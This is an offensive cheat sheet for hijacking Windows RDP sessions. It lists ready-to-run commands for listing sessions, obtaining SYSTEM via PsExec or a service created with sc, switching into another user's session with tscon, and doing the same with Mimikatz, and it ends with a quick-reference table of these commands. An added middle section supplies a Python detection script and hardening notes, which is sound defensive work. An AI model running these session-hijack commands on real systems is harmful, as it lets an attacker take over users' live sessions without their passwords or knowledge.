Overview

As SYSTEM, hijack active or disconnected RDP sessions without knowing the user’s password. Uses tscon to switch sessions.

List Sessions

query user
qwinsta
Output shows session IDs and state (Active/Disc).

Hijack — From SYSTEM

Get SYSTEM First

PsExec.exe -s cmd.exe
Or via service:
sc create sesshijack binpath= "cmd.exe /k tscon TARGET_SESSION_ID /dest:rdp-tcp#CURRENT_SESSION"
sc start sesshijack

Switch Session

tscon TARGET_SESSION_ID /dest:rdp-tcp#YOUR_SESSION_ID

Example

# You are in session 2, want to hijack session 1
tscon 1 /dest:rdp-tcp#2

Via Service (No Interactive SYSTEM)

sc create hijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#2"
net start hijack

Mimikatz Method

mimikatz # ts::sessions          # List sessions
mimikatz # token::elevate        # Get SYSTEM
mimikatz # ts::remote /id:1      # Hijack session 1

Notes

  • Requires SYSTEM privileges
  • Works on disconnected sessions too
  • No password needed for target session
  • User doesn’t get disconnected (attacker joins their session)
  • Server 2019+ may require additional steps
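From a defensive angle, the two variants above (tscon run directly as SYSTEM, and tscon wrapped in a service) leave distinct traces: a process-creation event for tscon.exe with a /dest: argument, a service-install event whose binary path contains tscon, and a session-reconnect event for the target session coming from a different client than before. The script below is an added example (not code from the original page) that runs those three checks over a constructed list of normalised events; the dict field names are an assumption of this script and should be mapped onto the corresponding fields of Security 4688 / Sysmon 1, System 7045 and Security 4778 in your own telemetry.

```python
"""Detection logic for the tscon session-switch technique documented above.

Added example (not code from the original page). It runs over a constructed
list of normalised Windows events whose field names are an assumption of this
script, mapped roughly onto:
  - Security 4688 / Sysmon 1  (process creation: user, image, cmdline, parent)
  - System 7045               (service installed: service_name, image_path)
  - Security 4778             (session reconnected: account, session_name,
                               client_name, client_address)
"""
import re

# tscon[.exe] ... /dest:<target>  (the exact switch shown on the page)
TSCON_DEST = re.compile(r"\btscon(?:\.exe)?\b.*?/dest:\s*(\S+)", re.IGNORECASE)
# any mention of tscon inside a service binary path
TSCON_ANY = re.compile(r"\btscon\b", re.IGNORECASE)

# Constructed sample events; values are illustrative, not real telemetry.
SAMPLE_EVENTS = [
    # 0: benign session listing by a normal user
    {"event_id": 4688, "user": "CORP\\alice", "image": r"C:\Windows\System32\query.exe",
     "cmdline": "query user", "parent": r"C:\Windows\System32\cmd.exe"},
    # 1: alice's own reconnect; establishes the baseline client for her session
    {"event_id": 4778, "account": "alice", "session_name": "RDP-Tcp#1",
     "client_name": "ALICE-LAPTOP", "client_address": "10.0.0.5"},
    # 2: tscon run as SYSTEM, switching session 1 onto rdp-tcp#2
    {"event_id": 4688, "user": "NT AUTHORITY\\SYSTEM", "image": r"C:\Windows\System32\tscon.exe",
     "cmdline": "tscon 1 /dest:rdp-tcp#2", "parent": r"C:\Windows\System32\cmd.exe"},
    # 3: service whose binary path wraps tscon (the "Via Service" variant)
    {"event_id": 7045, "user": "NT AUTHORITY\\SYSTEM", "service_name": "hijack",
     "image_path": 'cmd.exe /k tscon 1 /dest:rdp-tcp#2'},
    # 4: alice's session reconnected from a client never seen for it before
    {"event_id": 4778, "account": "alice", "session_name": "RDP-Tcp#1",
     "client_name": "WKS-0042", "client_address": "10.0.0.99"},
    # 5: tscon by a non-SYSTEM account; rare enough to review, lower severity
    {"event_id": 4688, "user": "CORP\\helpdesk", "image": r"C:\Windows\System32\tscon.exe",
     "cmdline": "tscon 3 /dest:console", "parent": r"C:\Windows\System32\cmd.exe"},
]


def is_system(user: str) -> bool:
    """True for the local SYSTEM account in DOMAIN\\user form."""
    return user.upper().endswith("\\SYSTEM")


def analyse(events):
    """Return findings as (event_index, rule, severity, detail) tuples."""
    findings = []
    # (account, session) -> client address seen at the last reconnect
    last_client = {}
    for i, ev in enumerate(events):
        eid = ev["event_id"]
        if eid in (4688, 1):
            # Rule 1: tscon with a /dest: target; SYSTEM is the page's precondition
            m = TSCON_DEST.search(ev.get("cmdline", ""))
            if m:
                sev = "high" if is_system(ev.get("user", "")) else "medium"
                findings.append((i, "tscon-session-switch", sev, f"dest={m.group(1)}"))
        elif eid == 7045:
            # Rule 2: service binary path invoking tscon
            if TSCON_ANY.search(ev.get("image_path", "")):
                findings.append((i, "service-wrapped-tscon", "high",
                                 f"service={ev.get('service_name', '?')}"))
        elif eid == 4778:
            # Rule 3: same session reconnected from a different client address
            key = (ev["account"].lower(), ev["session_name"].lower())
            prev = last_client.get(key)
            if prev is not None and prev != ev["client_address"]:
                findings.append((i, "reconnect-from-new-client", "medium",
                                 f"{prev} -> {ev['client_address']}"))
            last_client[key] = ev["client_address"]
    return findings


if __name__ == "__main__":
    for idx, rule, sev, detail in analyse(SAMPLE_EVENTS):
        print(f"[{sev:6}] event {idx}: {rule} ({detail})")
```

Rule 1 only works if command lines are recorded: for 4688 that means the "Include command line in process creation events" audit policy (or Sysmon). Rule 3 is stateful, so in a SIEM it becomes a lookup against the last known client per session rather than an in-memory dict. On the mitigation side, the "Set time limit for disconnected sessions" policy for Remote Desktop Services shrinks the pool of disconnected sessions that the Notes above say this technique also reaches.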

Quick Reference

Task            Command
List sessions   query user or qwinsta
Hijack          tscon SESSION_ID /dest:rdp-tcp#YOUR_SESSION
Via service     sc create hijack binpath= "cmd /k tscon ..."
Mimikatz        ts::remote /id:SESSION_ID